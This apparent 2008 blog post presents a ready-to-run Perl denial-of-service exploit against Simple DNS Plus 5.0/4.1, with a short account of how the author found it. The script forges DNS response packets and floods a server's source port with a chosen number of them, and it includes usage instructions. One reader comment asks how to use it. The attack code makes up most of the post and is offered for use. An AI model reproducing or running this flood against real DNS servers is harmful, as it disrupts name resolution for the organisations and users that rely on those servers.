Simple DNS Plus 5.0/4.1 remote Denial of Service exploit

Posted on July 12, 2008
Filed Under Exploits, Source code |

after reading the story about Dan kaminskys DNS cache posioning attack
and watching his ridiculous youtube cornflakes commercial
i decided to trace the source of this vulnerability.
so in order to understand how kaminsky attack is any diffrent from the traditional dns cache posioning
i started digging into some RFCs/documentations and playing with the protocol
to see if i can find some clues/logical faults.
yet i didnt find anything worthy and i wonder if kaminsky founding is just some algorithm of guessing a little bit faster the 16 bit transaction ID field

anyway while i was doing some tests on this Simple DNS server
i’ve found that if i repeatingly send DNS server response packets as if i was a root dns server
to the client port of the DNS server it will remotly cause a denial of service.

so what we have here is a DNS response packet built from scratch
that basicly flood the the source port of some “Simple DNS server Plus” and deny its service.
p.s: i used mutiple pack functions to make it more convenient
i could have just squeeze it into one pack but what the heck..

  1. #!/usr/bin/perl
  2. # Simple DNS Plus 5.0/4.1 < remote Denial of Service exploit
  3. #
  4. # usage: sdns-dos.pl <dns server> <dns source port> <num of packets>
  5. # Exploit written by Exodus.
  6. # http://www.blackhat.org.il
  7.  
  8. use IO::Socket;
  9.  
  10. if(@ARGV < 3){
  11. print("sdns-dos.pl <dns server> <dns source port> <num of packets>");
  12. }
  13. $sock = IO::Socket::INET->new(PeerAddr => "$ARGV[0]:$ARGV[1]", Proto => 'UDP') || die("Cant connect DNS server");
  14.  
  15.  
  16.  
  17. $address = $ARGV[0];
  18.  
  19. $trans = pack("H4","1337");
  20. $flags = pack("B16","1000010110110000");
  21. $question = pack("H4","0001");
  22. $answerRR = pack("H4","0001");
  23. $authorityRR = pack("H4","0000");
  24. $additionlRR = pack("H4","0000");
  25. $type = pack("H4","0001"); # A host name
  26. $class = pack("H4","0001"); # IN
  27.  
  28. @parts = split(/\./,$address);
  29. foreach $part (@parts)
  30. {
  31.  $packedlen = pack("H2",sprintf("%02x",length($part)));
  32.  $address2 .= $packedlen.$part;
  33. }
  34. $query = $address2. "\000" . $type . $class;
  35.  
  36. $aname = pack("H4","c00c");
  37. $atype = pack("H4","0001");
  38. $aclass = pack("H4","0001");
  39. $ttl = pack("H8","0000008d");
  40. $dlen = pack("H4","0004");
  41. $addr = inet_aton("127.0.0.1");
  42. $answer = $aname . $atype . $aclass . $ttl . $dlen . $addr;
  43.  
  44. $payload = $trans . $flags . $question . $answerRR
  45. . $authorityRR . $additionlRR . $query . $answer;
  46.  
  47. print "sending $ARGV[2] packets… ";
  48. for($i=0;$i<=$ARGV[2];$i++)
  49. {
  50.  print $sock $payload;
  51. }
  52. print "Done. Good bye.";
  53. __END__

Comments

One Response to “Simple DNS Plus 5.0/4.1 remote Denial of Service exploit”

  1. Varun just on September 10th, 2008 9:07 pm

    just plz tell me how to use them. I am noob. Plz help me or mail me

Leave a Reply